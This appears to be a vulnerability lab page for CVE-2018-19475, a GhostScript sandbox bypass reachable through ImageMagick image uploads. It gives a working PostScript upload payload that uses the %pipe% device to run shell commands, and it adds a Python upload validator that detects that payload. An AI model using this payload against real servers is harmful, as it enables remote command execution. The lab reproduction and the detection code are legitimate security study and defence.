GhostScript Sandbox Bypass Command Execution (CVE-2018-19475)


GhostScript is a suite of software built around an interpreter for Adobe Systems' PostScript and PDF page description languages. It is widely used by image processing libraries such as ImageMagick, which hand PostScript and PDF input to it for rendering.

In late 2018, Man Yue Mo from the Semmle Security Research Team published a variant of CVE-2018-16509, designated CVE-2018-19475. This vulnerability allows an attacker to bypass GhostScript's sandbox with a crafted image file and execute arbitrary commands in gs versions prior to 9.26.

References:

Environment Setup

Execute the following command to start a vulnerable environment (including GhostScript 9.25 and ImageMagick 7.0.8-20):

docker compose up -d

Once the server has started, browse to http://your-ip:8080; the page shows a file upload form.

Vulnerability Reproduction

Upload the following PoC as an image; it executes the command id > /tmp/success && cat /tmp/success:

POST /index.php HTTP/1.1
Host: target
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryukZmnyhO
Content-Length: 279

------WebKitFormBoundaryukZmnyhO
Content-Disposition: form-data; name="file_upload"; filename="1.jpg"
content-Type="image/png"

%!PS
0 1 300367 {} for
{save restore} stopped {} if
(%pipe%id > /tmp/success && cat /tmp/success) (w) file
------WebKitFormBoundaryukZmnyhO--

As shown in the response, the command is executed successfully.

In real-world scenarios, direct command output may not be returned to you, so you may need to use out-of-band techniques to confirm the vulnerability.
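As an added example, not part of the original page or of the Vulhub environment, the following Python check shows the upload-side validation that would have rejected this PoC: it compares the file's magic bytes with the extension the client claims, and flags PostScript content, including the %pipe% device used above. The sample input is a constructed copy of the page's PoC body; the function and constant names are assumptions.

```python
import re

# Magic bytes for the image types an upload form typically accepts (constructed list).
IMAGE_MAGIC = {
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "png": b"\x89PNG\r\n\x1a\n",
    "gif": b"GIF8",
}

# PostScript markers that should never appear in an uploaded "image".
# Caveat: %!PS is the plain-text signature only; binary-wrapped EPS (DOS EPS header)
# would slip past this regex, which is why the magic-byte comparison is the primary gate.
PS_HEADER = re.compile(rb"^\s*%!PS")
PIPE_DEVICE = re.compile(rb"%pipe%", re.IGNORECASE)

# Constructed sample: the PoC body shown above, uploaded under the filename 1.jpg.
POC_SAMPLE = (
    b"%!PS\n"
    b"0 1 300367 {} for\n"
    b"{save restore} stopped {} if\n"
    b"(%pipe%id > /tmp/success && cat /tmp/success) (w) file\n"
)

def classify_upload(filename: str, data: bytes) -> dict:
    """Return {'accept': bool, 'findings': [...]} for an uploaded file.

    The extension in `filename` is client-controlled, so it is only used to decide
    which magic bytes the content must start with; the content itself decides.
    """
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    expected = IMAGE_MAGIC.get(ext)
    findings = []
    if expected is None:
        findings.append("unsupported-extension")
    elif not data.startswith(expected):
        findings.append("magic-mismatch")
    if PS_HEADER.search(data[:64]):
        findings.append("postscript-content")
    if PIPE_DEVICE.search(data):
        findings.append("pipe-device")
    return {"accept": not findings, "findings": findings}

if __name__ == "__main__":
    print(classify_upload("1.jpg", POC_SAMPLE))
    print(classify_upload("photo.png", b"\x89PNG\r\n\x1a\n" + b"\x00" * 16))
```

Validation like this is defence in depth for the upload handler; the actual fix for CVE-2018-19475 is upgrading GhostScript to 9.26 or later.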